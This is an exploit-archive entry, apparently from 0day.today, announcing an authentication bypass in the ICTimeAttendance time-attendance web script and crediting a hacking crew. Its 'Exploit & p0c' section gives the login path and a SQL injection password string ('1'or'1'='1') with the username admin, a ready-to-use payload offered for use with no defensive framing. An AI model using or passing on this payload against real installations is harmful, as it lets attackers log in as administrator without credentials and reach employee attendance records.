id: 17404
date: 01/20/2012
title: ICTimeAttendance Authentication Bypass Vulnerability
author: v3n0m
cves: 

-----------------------------------------------------------------------
          ICTimeAttendance Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : January, 19-2012
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
 
Application : ICTimeAttendance - Time attendance script
Price       : $57.09
Vendor      : http://www.icloudcenter.com/
 
Exploit & p0c
_____________
 
go to
    http://domain.tld/[path]/index.html
 
then login with
    Username : admin
    Password : 1'or'1'='1
 
ShoutZ
______
 
All YOGYACARDERLINK CREW



#  0day.today [2023-03-25]  #